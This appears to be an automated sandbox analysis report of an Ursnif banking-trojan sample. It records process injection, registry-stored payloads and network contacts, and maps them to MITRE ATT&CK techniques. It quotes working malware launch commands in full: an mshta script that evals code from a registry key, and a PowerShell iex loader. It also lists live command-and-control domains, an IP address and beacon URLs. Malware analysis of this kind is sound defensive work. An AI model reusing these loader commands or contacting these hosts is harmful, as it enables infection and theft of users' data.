Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\control.exe

Thread created: unknown EIP: BD4F1580

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 5152	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe	Thread register set: target process: 2848

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7EEE712E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: A20000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7EEE712E0	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF770335FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 16D9CD20000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF770335FD0

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA74F.tmp' 'c:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB5E5.tmp' 'c:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 00000017.00000000.841154073.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000017.00000000.841414143.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.861521420.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000017.00000000.850569436.0000000005E50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.861521420.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000017.00000000.841414143.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.861521420.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000017.00000000.841414143.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.861521420.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000017.00000000.856000294.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_001F8B98 cpuid

1_2_001F8B98

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00B2B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_00B2B585

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_001F24C2 HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,Sleep,IsWow64Process,

1_2_001F24C2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_001F8B98 GetUserNameW,GetUserNameW,HeapFree,HeapFree,

1_2_001F8B98

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_001F7890 GetVersionExA,wsprintfA,

1_2_001F7890

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Valid Accounts1	Valid Accounts1	Software Packing1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Logon Script (Windows)	Access Token Manipulation1	DLL Side-Loading1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Process Injection713	Masquerading1	NTDS	System Information Discovery35	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Valid Accounts1	LSA Secrets	Security Software Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Virtualization/Sandbox Evasion3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion3	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection713	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Regsvr321	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2200.dll	16%	Virustotal		Browse
2200.dll	11%	Metadefender		Browse
2200.dll	39%	ReversingLabs	Win32.Trojan.Ursnif

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
c56.lepini.at	8%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
edge.gycpi.b.yahoodns.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://api3.lepini.at/api1/RIcDr3iQ_2F5HIV/n8436tIkJR8PrSjzuD/qVR2EWMqX/JHao30Cb5Ma6tPeJDvP0/Qpt0UP3yCDsC9Fp5cQv/WC3luav8wdMdeqfAWIs0lT/3HapmLJEH6Sr8/S94_2BZ_/2FhcJtKqyYatNIzqU2kqw4R/i383XEDNfh/7iCEha60plcDi0Gsi/YkbbHV8lpXBQ/om0NF0vi0Aw/RyBEHsBgFlPiJM/CB37HmU2lDcIAsK_2BgfJ/DHyfteBHJ3c0Jp8g/vCwxsQxKg_2FRoX/tZDGwkMH_2FCJ5tFJ3/Imp5riyeK/ktUBEA1N01Clwu/a3KCmmi	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
http://api3.lepini.at/api1/9tgtwLjb0tU0zx/gjkgUIt_2BDAbjs0GmiGf/jGKajlUv_2BCCAvj/GG7iDRArA8IwTDs/umyhHUUFxniPZSwiB1/Esmzl052W/VaAuas8dozcem21MrIfi/9YUq_2BOx3S4HJ73aAi/Vs0wStZxRwr04db1SG2ZhF/SDvfPYnIQuY21/wpQuP8zD/NKJ8gswNFYPlJUNd52s2mHl/F5u4SKY7Sb/kxNMhGHUlS6M7up7O/RKp4_2FZDHjQ/JbZOJmdSxil/58gaA96_2FkxAQ/MNrt1jQAMrd60eL4xAxxk/XtosXkxYrgp_2FaY/c1Ab0uIAwuv/A	0%	Avira URL Cloud	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.kkbox.com.tw/	0%	URL Reputation	safe
http://www.kkbox.com.tw/	0%	URL Reputation	safe
http://www.kkbox.com.tw/	0%	URL Reputation	safe
http://search.goo.ne.jp/favicon.ico	0%	URL Reputation	safe
http://search.goo.ne.jp/favicon.ico	0%	URL Reputation	safe
http://search.goo.ne.jp/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/	0%	URL Reputation	safe
http://www.etmall.com.tw/	0%	URL Reputation	safe
http://www.etmall.com.tw/	0%	URL Reputation	safe
http://www.amazon.co.uk/	0%	URL Reputation	safe
http://www.amazon.co.uk/	0%	URL Reputation	safe
http://www.amazon.co.uk/	0%	URL Reputation	safe
http://www.asharqalawsat.com/favicon.ico	0%	URL Reputation	safe
http://www.asharqalawsat.com/favicon.ico	0%	URL Reputation	safe
http://www.asharqalawsat.com/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	184.30.24.22	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	184.30.24.22	true	false		high
c56.lepini.at	35.228.31.40	true	true	8%, Virustotal, Browse	unknown
lg3.media.net	184.30.24.22	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	35.228.31.40	true	false	11%, Virustotal, Browse	unknown
geolocation.onetrust.com	104.20.185.68	true	false		high
edge.gycpi.b.yahoodns.net	87.248.118.23	true	false	0%, Virustotal, Browse	unknown
api10.laptok.at	35.228.31.40	true	false		unknown
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	true		unknown
s.yimg.com	unknown	unknown	false		high
web.vortex.data.msn.com	unknown	unknown	false		high
cvision.media.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api3.lepini.at/api1/RIcDr3iQ_2F5HIV/n8436tIkJR8PrSjzuD/qVR2EWMqX/JHao30Cb5Ma6tPeJDvP0/Qpt0UP3yCDsC9Fp5cQv/WC3luav8wdMdeqfAWIs0lT/3HapmLJEH6Sr8/S94_2BZ_/2FhcJtKqyYatNIzqU2kqw4R/i383XEDNfh/7iCEha60plcDi0Gsi/YkbbHV8lpXBQ/om0NF0vi0Aw/RyBEHsBgFlPiJM/CB37HmU2lDcIAsK_2BgfJ/DHyfteBHJ3c0Jp8g/vCwxsQxKg_2FRoX/tZDGwkMH_2FCJ5tFJ3/Imp5riyeK/ktUBEA1N01Clwu/a3KCmmi	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/9tgtwLjb0tU0zx/gjkgUIt_2BDAbjs0GmiGf/jGKajlUv_2BCCAvj/GG7iDRArA8IwTDs/umyhHUUFxniPZSwiB1/Esmzl052W/VaAuas8dozcem21MrIfi/9YUq_2BOx3S4HJ73aAi/Vs0wStZxRwr04db1SG2ZhF/SDvfPYnIQuY21/wpQuP8zD/NKJ8gswNFYPlJUNd52s2mHl/F5u4SKY7Sb/kxNMhGHUlS6M7up7O/RKp4_2FZDHjQ/JbZOJmdSxil/58gaA96_2FkxAQ/MNrt1jQAMrd60eL4xAxxk/XtosXkxYrgp_2FaY/c1Ab0uIAwuv/A	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.dailymail.co.uk/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://constitution.org/usdeclar.txtC:	regsvr32.exe, 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, powershell.exe, 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, explorer.exe, 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, control.exe, 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, rundll32.exe, 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	{CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://msk.afisha.ru/	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.reddit.com/	msapplication.xml4.3.dr	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.4.dr	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.hanafos.com/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://amzn.to/2TTxhNg	de-ch[1].htm.4.dr	false		high
